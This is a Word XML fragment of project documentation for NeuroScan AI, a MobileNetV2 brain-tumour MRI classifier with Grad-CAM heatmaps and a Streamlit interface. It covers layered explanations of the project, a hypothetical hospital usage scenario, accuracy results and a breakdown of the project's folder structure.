        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Our project is like a super-smart robot owl named **NeuroScan**. NeuroScan has looked at thousands of playground pictures before. When you show it a new picture, it immediately shouts, *'Aha! There is a monster hiding in the corner near the swing set!'* And even better, NeuroScan uses a magic glowing orange paintbrush to color directly over the monster so the doctor knows exactly where to look!"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2. Like Explaining to a Beginner with Basic Computer Knowledge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"NeuroScan AI is a website and computer vision program that identifies brain tumors from MRI scans. When a hospital takes a brain MRI, it is saved as an image file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>You simply drag and drop that image onto our webpage. Behind the scenes, a neural network—which is an artificial intelligence model trained on 5,600 verified brain scans—inspects the pixels. It calculates the odds of four possibilities: Glioma, Meningioma, Pituitary tumor, or Healthy Brain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Within half a second, the screen displays the most likely diagnosis with a percentage score. Next to the picture, the program draws a glowing thermal heatmap over the scan. This heatmap works like an X-ray highlighter: red and yellow spots show the exact pixels that convinced the AI that a tumor exists."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3. Like Explaining to a Technical Interviewer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"NeuroScan AI is an end-to-end medical image classification and interpretability platform implemented in Python using TensorFlow/Keras and Streamlit. The architecture utilizes transfer learning with a MobileNetV2 backbone pretrained on ImageNet, coupled with a custom dense classification head incorporating Global Average Pooling, Batch Normalization, and Dropout for regularization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The pipeline processes 224x224x3 cranial MRI scans across four classes. To overcome the black-box dilemma in clinical AI, we implemented a custom Grad-CAM module using TensorFlow's `GradientTape`. It backpropagates class-specific score gradients to the final convolutional layer (`out_relu`), computes global-average-pooled channel importance weights, and applies a rectified linear combination to construct a 2D saliency map.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Empirically, training on the complete 5,600-image dataset boosted test accuracy on 1,600 untouched scans from an 82.19% baseline to 86.12%, with meningioma sensitivity jumping from 63.5% to 78.5% and healthy brain recall achieving 99.0%. The production model is deployed via a reactive Streamlit application featuring in-memory model caching via `@st.cache_resource`."</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1.9 A Realistic End-to-End Clinical Usage Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Setting:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Department of Emergency Radiology, St. Jude Regional Hospital.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Time:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 02:15 AM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Patient:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A 52-year-old female arrives with acute severe cephalalgia (headache), left-sided hemiparesis, and disorientation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The MRI technician runs a rapid axial cranial scan. The scanner outputs an axial T1 slice showing a mass near the right frontoparietal convexity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The resident radiologist opens </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>NeuroScan AI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the browser (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>http://localhost:8501</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The resident drags the MRI slice into the file uploader.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Within 400 milliseconds:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The Primary Diagnosis Banner lights up: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>⚠️ Meningioma Tumor — 91.4% Confidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The Multi-Class Probability distribution indicates:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Meningioma: 91.42%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Glioma: 6.81%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Pituitary: 1.63%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Healthy (No Tumor): 0.14%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Grad-CAM Saliency Studio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> renders an intense red-yellow hotspot along the extra-axial dural margin of the right frontoparietal lobe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The resident verifies that the network is focusing directly on the dural attachment and not skull bone or ventricular fluid. Confident in the automated screening corroboration, the resident immediately pages the on-call neurosurgeon for surgical decompression.</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2: Project Folder Structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.1 Complete Directory Tree</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the exact filesystem structure of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>d:\Brain_Tumor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> workspace: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d:\Brain_Tumor</w:t>
              <w:br/>
              <w:t>├── .git/                                               # Git version control repository database</w:t>
              <w:br/>
              <w:t>├── .gitignore                                          # Specifies files ignored by version control</w:t>
              <w:br/>
              <w:t>├── .venv/                                              # Isolated Python 3.11 virtual environment</w:t>
              <w:br/>
              <w:t>├── dataset/                                            # Raw MRI dataset directory</w:t>
              <w:br/>
              <w:t>│   ├── Testing/                                        # Untouched test set (1,600 images)</w:t>
              <w:br/>
              <w:t>│   │   ├── glioma/                                     # 400 test images for glioma</w:t>
              <w:br/>
              <w:t>│   │   ├── meningioma/                                 # 400 test images for meningioma</w:t>
              <w:br/>
              <w:t>│   │   ├── notumor/                                    # 400 test images for healthy brains</w:t>
              <w:br/>
              <w:t>│   │   └── pituitary/                                  # 400 test images for pituitary adenoma</w:t>
              <w:br/>
              <w:t>│   └── Training/                                       # Full training set (5,600 images)</w:t>
              <w:br/>
              <w:t>│       ├── glioma/                                     # 1,400 training images</w:t>
              <w:br/>
              <w:t>│       ├── meningioma/                                 # 1,400 training images</w:t>
              <w:br/>
              <w:t>│       ├── notumor/                                    # 1,400 training images</w:t>
              <w:br/>
              <w:t>│       └── pituitary/                                  # 1,400 training images</w:t>
              <w:br/>
              <w:t>├── models/                                             # Serialized neural network checkpoints</w:t>
              <w:br/>
              <w:t>│   ├── brain_tumor_mobilenetv2_best.keras             # Baseline checkpoint from 80/20 run (11.1 MB)</w:t>
              <w:br/>
              <w:t>│   └── brain_tumor_mobilenetv2_full_scratch.keras     # Production checkpoint from full retrain (11.1 MB)</w:t>
              <w:br/>
              <w:t>├── notebooks/                                          # Jupyter research &amp; experimentation notebooks</w:t>
              <w:br/>
              <w:t>│   ├── 01_data_exploration.ipynb                       # Dataset auditing, resolution check, MD5 leak audit</w:t>
              <w:br/>
              <w:t>│   └── 02_model_training.ipynb                         # Model architecture, training loops, evaluation, Grad-CAM</w:t>
              <w:br/>
              <w:t>├── app.py                                              # Streamlit web application &amp; clinical dashboard</w:t>
              <w:br/>
              <w:t>├── README.md                                           # Comprehensive GitHub project presentation document</w:t>
              <w:br/>
              <w:t>└── requirements.txt                                    # Explicitly pinned third-party package dependencies</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2.2 Deep Breakdown of Every File and Folder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1. `app.py`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>What it contains:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The complete Python source code for the interactive Streamlit medical dashboard. It includes model loading, caching decorators, image tensor preprocessing, the Grad-CAM calculation engine, OpenCV color blending, and the reactive UI layout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why it exists:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Serves as the user-facing application and production deployment entry point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Responsibility:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Accepts user image uploads, executes inference and explainability routines, and renders visual diagnostics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Which other files use it:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> End-users run it via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>streamlit run app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. It imports weights from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>models/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and samples from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dataset/Testing/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential or Optional?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is the core application delivering user value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode if Missing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Users cannot interact with the system via a graphical interface; inference could only occur through raw Python scripts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Creation Method:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manually written and iteratively refined.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2. `notebooks/01_data_exploration.ipynb`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>What it contains:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploratory Data Analysis (EDA) code covering class distribution bar charts, image dimensions and aspect ratios, color channel distributions (RGB vs. L vs. RGBA), and MD5 cryptographic hash deduplication checks between training and testing sets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why it exists:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Machine learning rule #1 is "Understand your data before modeling." This notebook validates dataset integrity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Responsibility:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proves there is zero data leakage between train and test splits, verifies dataset balance (1,400 train / 400 test per class), and documents the need for 224x224 RGB resizing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Which other files use it:</w:t>
      </w:r>
      <w:r>
